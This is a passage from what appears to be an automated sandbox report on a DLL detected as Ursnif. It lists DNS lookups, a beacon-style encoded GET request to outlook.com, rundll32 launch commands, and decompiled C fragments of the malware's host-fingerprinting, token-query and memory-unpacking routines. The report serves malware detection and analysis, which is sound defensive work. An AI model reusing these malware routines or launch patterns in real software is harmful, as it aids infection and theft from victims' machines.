Jul 9, 2021 15:24:34.300118923 CEST	8.8.8.8	192.168.2.3	0xcc0b	No error (0)	outlook.office365.com	outlook.ha.office365.com		CNAME (Canonical name)	IN (0x0001)
Jul 9, 2021 15:24:34.300118923 CEST	8.8.8.8	192.168.2.3	0xcc0b	No error (0)	outlook.ha.office365.com	outlook.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
Jul 9, 2021 15:24:34.300118923 CEST	8.8.8.8	192.168.2.3	0xcc0b	No error (0)	outlook.ms-acdc.office.com	ZRH-efz.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
Jul 9, 2021 15:24:34.300118923 CEST	8.8.8.8	192.168.2.3	0xcc0b	No error (0)	ZRH-efz.ms-acdc.office.com		52.98.163.18	A (IP address)	IN (0x0001)
Jul 9, 2021 15:24:34.300118923 CEST	8.8.8.8	192.168.2.3	0xcc0b	No error (0)	ZRH-efz.ms-acdc.office.com		52.97.232.194	A (IP address)	IN (0x0001)
Jul 9, 2021 15:24:34.300118923 CEST	8.8.8.8	192.168.2.3	0xcc0b	No error (0)	ZRH-efz.ms-acdc.office.com		52.97.201.210	A (IP address)	IN (0x0001)
Jul 9, 2021 15:24:34.300118923 CEST	8.8.8.8	192.168.2.3	0xcc0b	No error (0)	ZRH-efz.ms-acdc.office.com		52.97.232.210	A (IP address)	IN (0x0001)
Jul 9, 2021 15:24:34.399265051 CEST	8.8.8.8	192.168.2.3	0xa524	No error (0)	outlook.office365.com	outlook.ha.office365.com		CNAME (Canonical name)	IN (0x0001)
Jul 9, 2021 15:24:34.399265051 CEST	8.8.8.8	192.168.2.3	0xa524	No error (0)	outlook.ha.office365.com	outlook.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
Jul 9, 2021 15:24:34.399265051 CEST	8.8.8.8	192.168.2.3	0xa524	No error (0)	outlook.ms-acdc.office.com	ZRH-efz.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
Jul 9, 2021 15:24:34.399265051 CEST	8.8.8.8	192.168.2.3	0xa524	No error (0)	ZRH-efz.ms-acdc.office.com		52.97.201.194	A (IP address)	IN (0x0001)
Jul 9, 2021 15:24:34.399265051 CEST	8.8.8.8	192.168.2.3	0xa524	No error (0)	ZRH-efz.ms-acdc.office.com		52.97.186.146	A (IP address)	IN (0x0001)
Jul 9, 2021 15:24:34.399265051 CEST	8.8.8.8	192.168.2.3	0xa524	No error (0)	ZRH-efz.ms-acdc.office.com		52.97.186.114	A (IP address)	IN (0x0001)
Jul 9, 2021 15:24:34.399265051 CEST	8.8.8.8	192.168.2.3	0xa524	No error (0)	ZRH-efz.ms-acdc.office.com		52.97.201.210	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

outlook.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49729	40.97.128.194	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jul 9, 2021 15:24:33.634449005 CEST	1321	OUT	GET /jdraw/D_2BiqNvBbnsXvuMxmM/t9_2FNHkYnKYRDnfwXuIAV/PZdbgLkzH6hzl/QBVRJ_2F/gFwgPVc3A_2BGFDYWcxhxu6/95nq35D0eQ/F_2Bmi0291iuqGJ2R/Lk7llVNKTp1W/ZOLoPeu_2F4/nTZWoYdvVj3RXx/XwwFNQtzd_2FkWk0UpQTO/wz8fmYfCTc8Ok1p_/2Bs3Gpetltr/L74Ig5cboZ/m.crw HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: outlook.com Connection: Keep-Alive
Jul 9, 2021 15:24:33.761584997 CEST	1322	IN	HTTP/1.1 301 Moved Permanently Cache-Control: no-cache Pragma: no-cache Location: https://outlook.com/jdraw/D_2BiqNvBbnsXvuMxmM/t9_2FNHkYnKYRDnfwXuIAV/PZdbgLkzH6hzl/QBVRJ_2F/gFwgPVc3A_2BGFDYWcxhxu6/95nq35D0eQ/F_2Bmi0291iuqGJ2R/Lk7llVNKTp1W/ZOLoPeu_2F4/nTZWoYdvVj3RXx/XwwFNQtzd_2FkWk0UpQTO/wz8fmYfCTc8Ok1p_/2Bs3Gpetltr/L74Ig5cboZ/m.crw Server: Microsoft-IIS/10.0 request-id: ae6a76ce-6de3-1bc0-a54d-4b3cc446f95e X-FEServer: DM5PR2201CA0020 X-RequestId: 75af693c-32c0-4f49-a3d1-8caa8be9ee47 X-Powered-By: ASP.NET X-FEServer: DM5PR2201CA0020 Date: Fri, 09 Jul 2021 13:24:33 GMT Connection: close Content-Length: 0

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 4796 Parent PID: 5532

General

Start time:	15:23:10
Start date:	09/07/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\c36.dll'
Imagebase:	0x970000
File size:	116736 bytes
MD5 hash:	542795ADF7CC08EFCF675D65310596E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000002.480154797.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.391097194.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.391161462.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.390899688.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.391143928.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.390847636.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.390939253.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.390979627.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.391054400.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 1636 Parent PID: 4796

General

Start time:	15:23:10
Start date:	09/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\c36.dll',#1
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 1488 Parent PID: 4796

General

Start time:	15:23:10
Start date:	09/07/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\c36.dll,Beautyresult
Imagebase:	0x11b0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 1844 Parent PID: 1636

General

Start time:	15:23:10
Start date:	09/07/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\c36.dll',#1
Imagebase:	0x11b0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.437029493.0000000005A38000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.437142340.0000000005A38000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.436946677.0000000005A38000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000002.482068718.0000000005A38000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.437405999.0000000005A38000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.437098624.0000000005A38000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.437339959.0000000005A38000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.436834249.0000000005A38000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.437249428.0000000005A38000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 1632 Parent PID: 4796

General

Start time:	15:23:15
Start date:	09/07/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\c36.dll,Division
Imagebase:	0x11b0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 5520 Parent PID: 4796

General

Start time:	15:23:19
Start date:	09/07/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\c36.dll,Fastcolor
Imagebase:	0x11b0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 2616 Parent PID: 4796

General

Start time:	15:23:24
Start date:	09/07/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\c36.dll,Yetclose
Imagebase:	0x11b0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 5468 Parent PID: 792

General

Start time:	15:24:28
Start date:	09/07/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x7ff6d8670000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 3008 Parent PID: 5468

General

Start time:	15:24:29
Start date:	09/07/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5468 CREDAT:17410 /prefetch:2
Imagebase:	0x1170000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 1948 Parent PID: 1632

General

Start time:	15:24:38
Start date:	09/07/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 1632 -s 852
Imagebase:	0x1110000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 4796 Parent PID: 5532 loaddll32.exeCOMMON

Executed Functions

Function 6E1DD186, Relevance: 66.4, APIs: 44, Instructions: 432COMMON

Download Yara Rule

APIs

___getlocaleinfo.LIBCMT ref: 6E1DD1BD
___getlocaleinfo.LIBCMT ref: 6E1DD1D2
___getlocaleinfo.LIBCMT ref: 6E1DD1E7
___getlocaleinfo.LIBCMT ref: 6E1DD1FC
___getlocaleinfo.LIBCMT ref: 6E1DD214
___getlocaleinfo.LIBCMT ref: 6E1DD229
___getlocaleinfo.LIBCMT ref: 6E1DD23B
___getlocaleinfo.LIBCMT ref: 6E1DD250
___getlocaleinfo.LIBCMT ref: 6E1DD268
___getlocaleinfo.LIBCMT ref: 6E1DD27D

Memory Dump Source

Source File: 00000002.00000002.483277940.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: ___getlocaleinfo
String ID:
API String ID: 1937885557-0
Opcode ID: eabbdf657e399f07c2ee4d9dc041221e202d76291481bf30a1e5e3ccc471cc6b
Instruction ID: 517100233a267b388a3115fc3f534ab3b261f572310cf674ae543865285e25d9
Opcode Fuzzy Hash: eabbdf657e399f07c2ee4d9dc041221e202d76291481bf30a1e5e3ccc471cc6b
Instruction Fuzzy Hash: 6FE1D0B290060DBEEF12CAF0CC45DFFB7BDEB04748F44092AB655E3450EA71AA459760

Uniqueness

Uniqueness Score: -1.00%

Function 6E20434D, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,00000984,00003000,00000040,00000984,6E203DA0), ref: 6E20440A
VirtualAlloc.KERNEL32(00000000,000000A9,00003000,00000040,6E203DFF), ref: 6E204441
VirtualAlloc.KERNEL32(00000000,00014055,00003000,00000040), ref: 6E2044A1
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E2044D7
VirtualProtect.KERNEL32(6E1A0000,00000000,00000004,6E20432C), ref: 6E2045DC
VirtualProtect.KERNEL32(6E1A0000,00001000,00000004,6E20432C), ref: 6E204603
VirtualProtect.KERNEL32(00000000,?,00000002,6E20432C), ref: 6E2046D0
VirtualProtect.KERNEL32(00000000,?,00000002,6E20432C,?), ref: 6E204726
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E204742

Memory Dump Source

Source File: 00000002.00000002.484393967.000000006E203000.00000040.00020000.sdmp, Offset: 6E203000, based on PE: false

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: a6d96d1dbdd5adef407acf436f0e5e0eb20350914394ba89f38f1094e73ed8d8
Instruction ID: daca50e72d554e6f2bda88c07d6aad315520f13b274166a7ba2db3b46f3f6995
Opcode Fuzzy Hash: a6d96d1dbdd5adef407acf436f0e5e0eb20350914394ba89f38f1094e73ed8d8
Instruction Fuzzy Hash: E9D192F6500602DFDB11DF54C8A0BB177A6FF9A350B1941B5ED099F29AD770B801CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A1ADA, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E6E1A1ADA(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L6E1A2130();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x6e1a4144;
				_push(_t15 + 0x6e1a505e);
				_push(_t15 + 0x6e1a5054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L6E1A212A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x6e1a4148, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x6e1a1ada
0x6e1a1ae3
0x6e1a1ae7
0x6e1a1aed
0x6e1a1af2
0x6e1a1af7
0x6e1a1afa
0x6e1a1afd
0x6e1a1b02
0x6e1a1b03
0x6e1a1b06
0x6e1a1b11
0x6e1a1b18
0x6e1a1b1c
0x6e1a1b1e
0x6e1a1b1f
0x6e1a1b22
0x6e1a1b27
0x6e1a1b31
0x6e1a1b33
0x6e1a1b33
0x6e1a1b47
0x6e1a1b4d
0x6e1a1b51
0x6e1a1ba1
0x6e1a1b53
0x6e1a1b5c
0x6e1a1b72
0x6e1a1b7a
0x6e1a1b8c
0x6e1a1b90
0x00000000
0x00000000
0x6e1a1b7c
0x6e1a1b7f
0x6e1a1b84
0x6e1a1b86
0x6e1a1b86
0x6e1a1b67
0x6e1a1b69
0x6e1a1b92
0x6e1a1b93
0x6e1a1b93
0x6e1a1b5c
0x6e1a1ba9

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,6E1A1ECE,0000000A,?,?), ref: 6E1A1AE7
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6E1A1AFD
_snwprintf.NTDLL ref: 6E1A1B22
CreateFileMappingW.KERNELBASE(000000FF,6E1A4148,00000004,00000000,?,?), ref: 6E1A1B47
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E1A1ECE,0000000A,?), ref: 6E1A1B5E
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 6E1A1B72
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E1A1ECE,0000000A,?), ref: 6E1A1B8A
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6E1A1ECE,0000000A), ref: 6E1A1B93
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E1A1ECE,0000000A,?), ref: 6E1A1B9B

Memory Dump Source

Source File: 00000002.00000002.482973079.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.482953775.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.483022155.000000006E1A3000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.483068232.000000006E1A5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.483115438.000000006E1A6000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1724014008-0
Opcode ID: 461e0361353e01b7b4510d4a3b92e09e90ec861ea6845b1c82a3fbf113e45b93
Instruction ID: b7453425ce910d4e21980800672772c4af34a924eeb3f964a181a5066517d645
Opcode Fuzzy Hash: 461e0361353e01b7b4510d4a3b92e09e90ec861ea6845b1c82a3fbf113e45b93
Instruction Fuzzy Hash: 622174BAA00108BFDB019FECCC88EBE7779EB55355F218025F715E7180E6309986AB60

Uniqueness

Uniqueness Score: -1.00%

Function 02EA9135, Relevance: 12.1, APIs: 8, Instructions: 103
memoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E02EA9135(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				int _t54;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x2ead270; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E02EAA6CC( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x2ead2a4 ^ 0x4c0ca0ae;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x2ead238, 0, _t50 + _t50);
						if(_t62 != 0) {
							_t54 = GetUserNameW(_t62,  &_v8); // executed
							if(_t54 != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E02EA7306(_v8 + _v8, _t64);
							}
							HeapFree( *0x2ead238, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x2ead238, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E02EA7306(_v8 + _v8, _t64);
						}
						HeapFree( *0x2ead238, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}

0x02ea9135
0x02ea913d
0x02ea9141
0x02ea9144
0x02ea9149
0x02ea914b
0x02ea9150
0x02ea9150
0x02ea9156
0x02ea9158
0x02ea9165
0x02ea91c6
0x02ea9167
0x02ea916c
0x02ea9172
0x02ea9177
0x02ea9185
0x02ea9189
0x02ea9190
0x02ea9198
0x02ea919f
0x02ea91a6
0x02ea91a6
0x02ea91b1
0x02ea91b1
0x02ea9189
0x02ea9177
0x02ea91c8
0x02ea91ce
0x02ea91d8
0x02ea91da
0x02ea91df
0x02ea91ee
0x02ea91f2
0x02ea91fd
0x02ea9204
0x02ea920b
0x02ea920b
0x02ea9217
0x02ea9217
0x02ea91f2
0x02ea9222
0x02ea9224
0x02ea9227
0x02ea9229
0x02ea922c
0x02ea922f
0x02ea9239
0x02ea923d
0x02ea9241

APIs

GetUserNameW.ADVAPI32(00000000,?), ref: 02EA916C
RtlAllocateHeap.NTDLL(00000000,?), ref: 02EA9183
GetUserNameW.ADVAPI32(00000000,?), ref: 02EA9190
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,02EA5D20), ref: 02EA91B1
GetComputerNameW.KERNEL32(00000000,00000000), ref: 02EA91D8
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 02EA91EC
GetComputerNameW.KERNEL32(00000000,00000000), ref: 02EA91F9
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,02EA5D20), ref: 02EA9217

Memory Dump Source

Source File: 00000002.00000002.479405734.0000000002EA1000.00000020.00000001.sdmp, Offset: 02EA0000, based on PE: true

Associated: 00000002.00000002.479379747.0000000002EA0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479456411.0000000002EAC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.479484938.0000000002EAD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479532107.0000000002EAF000.00000002.00000001.sdmp Download File

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID:
API String ID: 3239747167-0
Opcode ID: 2c71dd2aa8b02dcca46fd2860b9fd6beb40bbfb9788ed1d76853421fb847788b
Instruction ID: faacc92eeddfdb04e496e8db1716a20c5c01fced4dffe503440317faff38cac0
Opcode Fuzzy Hash: 2c71dd2aa8b02dcca46fd2860b9fd6beb40bbfb9788ed1d76853421fb847788b
Instruction Fuzzy Hash: F2313B71A80205EFDB10DFAADCD1AAEB7F9EF44304B618469E508DB210DB30FA519B20

Uniqueness

Uniqueness Score: -1.00%

Function 02EA5A27, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E02EA5A27(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E02EAA71F(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E02EAA734(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}

0x02ea5a34
0x02ea5a35
0x02ea5a36
0x02ea5a37
0x02ea5a38
0x02ea5a3c
0x02ea5a43
0x02ea5a52
0x02ea5a55
0x02ea5a58
0x02ea5a5f
0x02ea5a62
0x02ea5a65
0x02ea5a68
0x02ea5a6b
0x02ea5a76
0x02ea5a78
0x02ea5a81
0x02ea5a89
0x02ea5a8b
0x02ea5a9d
0x02ea5aa7
0x02ea5aab
0x02ea5aba
0x02ea5abe
0x02ea5ac7
0x02ea5acf
0x02ea5acf
0x02ea5ad1
0x02ea5ad1
0x02ea5ad9
0x02ea5adf
0x02ea5ae3
0x02ea5ae3
0x02ea5aee

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 02EA5A6E
NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 02EA5A81
NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 02EA5A9D

Part of subcall function 02EAA71F: RtlAllocateHeap.NTDLL(00000000,00000000,02EA5595), ref: 02EAA72B

NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 02EA5ABA
memcpy.NTDLL(00000000,00000000,0000001C), ref: 02EA5AC7
NtClose.NTDLL(?), ref: 02EA5AD9
NtClose.NTDLL(00000000), ref: 02EA5AE3

Memory Dump Source

Source File: 00000002.00000002.479405734.0000000002EA1000.00000020.00000001.sdmp, Offset: 02EA0000, based on PE: true

Associated: 00000002.00000002.479379747.0000000002EA0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479456411.0000000002EAC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.479484938.0000000002EAD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479532107.0000000002EAF000.00000002.00000001.sdmp Download File

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: 14e57d76373356c549b800f90499844331c13ab9b8982647280605ed166a0518
Instruction ID: 71c7f7ec0736e3cc24bf069ed0719c586eef19d09c81945819195c0a9ee444da
Opcode Fuzzy Hash: 14e57d76373356c549b800f90499844331c13ab9b8982647280605ed166a0518
Instruction Fuzzy Hash: D2211B72A80218BBDF019F95CC85ADEBFBDEF08744F609022F905EA110D771AA54DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CD1F0, Relevance: 9.5, APIs: 6, Instructions: 492COMMON

Download Yara Rule

APIs

std::locale::locale.LIBCPMTD ref: 6E1CD22B

Part of subcall function 6E1CE190: std::locale::_Init.LIBCPMT ref: 6E1CE197
Part of subcall function 6E1CE190: std::locale::facet::_Incref.LIBCPMTD ref: 6E1CE1A8

_setlocale.LIBCMT ref: 6E1CD251
SetConsoleOutputCP.KERNELBASE(000004E3), ref: 6E1CD272
GetTempPathA.KERNEL32(00000550,6E2037E0), ref: 6E1CD2AF
SetConsoleCP.KERNELBASE(00000000), ref: 6E1CD30C
GetWindowsDirectoryA.KERNEL32(6E298C60,00000550), ref: 6E1CD3EC

Memory Dump Source

Source File: 00000002.00000002.483277940.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: Console$DirectoryIncrefInitOutputPathTempWindows_setlocalestd::locale::_std::locale::facet::_std::locale::locale
String ID:
API String ID: 3520124897-0
Opcode ID: 468db8fc8ad49e4b4dbe70df5ed3601b12b9436ebfa0dc25b475f3bd20d9e98a
Instruction ID: 4c2df5d4404c3fa1fe948e823e49738ea069e064c9d20e8c68642c6207f55174
